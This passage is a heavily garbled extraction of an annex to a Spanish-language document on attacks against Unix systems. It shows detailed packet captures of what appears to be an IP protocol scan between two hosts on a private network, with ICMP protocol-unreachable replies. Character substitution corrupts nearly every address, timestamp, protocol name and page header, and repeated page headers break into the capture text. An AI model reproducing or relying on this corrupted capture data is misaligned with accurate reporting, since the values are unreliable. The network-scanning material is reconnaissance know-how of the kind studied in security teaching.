Paquete nro. 3 - Tiempo 0.+(005+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D0) ,o7igo:0 De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.( > 19(.16).0.60 e!'o-reque t 0 Paquete nro. + - Tiempo 0.+(0+11 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D00 ,o7igo:0 De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( e!'o-rep"E 0 Paquete nro. 5 - Tiempo 0.)(39+6 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0( 9igmp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:**

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *++ de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 igmp ; $a> Paquete nro. 6 - Tiempo (.((79(9 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0( 9igmp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 igmp ; $a> Paquete nro. 7 - Tiempo (.631907 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D03 9ggp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 ggp Paquete nro. ) - Tiempo (.63(17( 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 9 - Tiempo 3.036036 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0+ 9ipen!ap: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 ipen!ap Paquete nro. 10 - Tiempo 3.036615 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 11 - Tiempo 3.30)557 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P >'o 'a 19(.16).0.(

aE

19(.16).0.60

Paquete nro. 1( - Tiempo 3.30)5)6 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P i at 00:17:31:96:5b:1f Paquete nro. 13 - Tiempo 3.707)1+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D05 9 t: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60

aE

19(.16).0.(

Paquete nro. 1+ - Tiempo 3.70)1+9 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 15 - Tiempo +.111)77 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D06 9t!p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:535)0 > 19(.16).0.60:535)0 # Paquete nro. 16 - Tiempo +.11((9( 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D06 9t!p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.60:535)0 > 19(.16).0.(:535)0 $ Paquete nro. 17 - Tiempo +.515)37 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D07 97: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 7

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+O de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete nro. 1) - Tiempo +.51613+ 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 19 - Tiempo +.9199++ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0) 9egp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 egp Paquete nro. (0 - Tiempo +.9(05+( 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. (1 - Tiempo 5.3(3)17 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D09 9igp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 igp Paquete nro. (( - Tiempo 5.3(+(0) 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. (3 - Tiempo 5.7(+06( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0a 910: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 10 Paquete nro. (+ - Tiempo 5.7(+63) 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. (5 - Tiempo 6.1(7)1( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0b 911: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 11 Paquete nro. (6 - Tiempo 6.1()153 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. (7 - Tiempo 6.531771 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0! 9pup: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 pup Paquete nro. () - Tiempo 6.53((65 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. (9 - Tiempo 6.9+1+(7 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D07 913: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 13

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+0 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete nro. 30 - Tiempo 6.9+(((3 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 31 - Tiempo 7.3+371( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0e 91+: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 1+ Paquete nro. 3( - Tiempo 7.3+3950 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 33 - Tiempo 7.7+7)51 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0f 915: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 15 Paquete nro. 3+ - Tiempo ).151665 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0f 915: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 15 Paquete nro. 35 - Tiempo ).555+)( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D10 916: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 16 Paquete nro. 36 - Tiempo ).55575+ 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 37 - Tiempo ).95561) 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D11 9u7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 8P ; KDP 19(.16).0.(:535)0 > 19(.16).0.60:535)0 Paquete nro. 3) - Tiempo 9.359+70 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D11 9u7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 8P ; KDP 19(.16).0.(:535)1 > 19(.16).0.60:535)0 Paquete nro. 39 - Tiempo 9.359665 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:3 De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' 3 ; 8Perror ; KDPerror Paquete nro. +0 - Tiempo 10.763671 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0f 915: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 15 Paquete nro. +1 - Tiempo 10.76+7(1 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O. de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete nro. +( - Tiempo 11.167376 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0( 9igmp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 igmp ; $a> Paquete nro. +3 - Tiempo 1(.571309 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0( 9igmp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 igmp ; $a> Paquete nro. ++ - Tiempo 1(.971++1 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1( 91): 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 1) Paquete nro. +5 - Tiempo 1(.97(059 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. +6 - Tiempo 13.375(06 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D13 919: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 19 Paquete nro. +7 - Tiempo 13.375505 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. +) - Tiempo 13.775305 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1+ 9'mp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 'mp Paquete nro. +9 - Tiempo 13.775)33 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 50 - Tiempo 1+.1)0+() 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D15 9(1: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (1 Paquete nro. 51 - Tiempo 1+.5)3311 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D15 9(1: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (1 Paquete nro. 5( - Tiempo 1+.5)361) 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 53 - Tiempo 1+.9)7576 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D16 9Dn Ai7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 Dn Ai7p Paquete nro. 5+ - Tiempo 15.391115

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O* de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D16 9Dn Ai7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 Dn Ai7p Paquete nro. 55 - Tiempo 15.3915() 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 56 - Tiempo 15.7911+7 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D17 9(3: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (3 Paquete nro. 57 - Tiempo 16.191357 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D17 9(3: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (3 Paquete nro. 5) - Tiempo 16.595(09 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D17 9(3: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (3 Paquete nro. 59 - Tiempo 16.595615 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 60 - Tiempo 16.99901) 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1) 9(+: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (+ Paquete nro. 61 - Tiempo 17.39907( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1) 9(+: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (+ Paquete nro. 6( - Tiempo 17.399++) 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 63 - Tiempo 17.)0303) 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D19 9(5: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (5 Paquete nro. 6+ - Tiempo 1).(06951 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D19 9(5: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (5 Paquete nro. 65 - Tiempo 1).61116+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D19 9(5: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (5 Paquete nro. 66 - Tiempo 1).611509 8P Origen: 19(.16).0.60 -> 19(.16).0.(

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O2 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 67 - Tiempo 19.0150+6 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1a 9(6: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (6 Paquete nro. 6) - Tiempo 19.+1)9(( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1a 9(6: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (6 Paquete nro. 69 - Tiempo 19.+19173 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 70 - Tiempo 19.)(()6) 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1b 9r7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 r7p Paquete nro. 71 - Tiempo (0.(((913 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1b 9r7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 r7p Paquete nro. 7( - Tiempo (0.6(6)6+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1b 9r7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 r7p Paquete nro. 73 - Tiempo (0.6(7(19 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 7+ - Tiempo (1.031009 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1! 9(): 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 () Paquete nro. 75 - Tiempo (1.+3(+0) 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1! 9(): 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 () Paquete nro. 76 - Tiempo (1.+3(666 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 77 - Tiempo (1.)3+716 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D17 9i oAtp+: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 i oAtp+ Paquete nro. 7) - Tiempo ((.(3)7+6 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D17 9i oAtp+: 9...:

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O- de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 i oAtp+ Paquete nro. 79 - Tiempo ((.6+(6)+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D17 9i oAtp+: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 i oAtp+ Paquete nro. )0 - Tiempo ((.6+301) 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. )1 - Tiempo (3.++6)(+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1e 930: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 30 Paquete nro. )( - Tiempo (3.++71++ 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. )3 - Tiempo (+.(50937 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1f 931: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 31 Paquete nro. )+ - Tiempo (5.05+569 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1f 931: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 31 Paquete nro. )5 - Tiempo (5.05+970 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. )6 - Tiempo (5.6(5777 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P >'o 'a 19(.16).0.(

aE

19(.16).0.60

Paquete nro. )7 - Tiempo (5.6(5)06 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P i at 00:17:31:96:5b:1f

aE

19(.16).0.(

Paquete nro. )) - Tiempo (6.+(65+0 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(0 93(: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 3( Paquete nro. )9 - Tiempo (6.+(7110 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 90 - Tiempo (7.(3++93 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(1 933: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:**

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O1 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


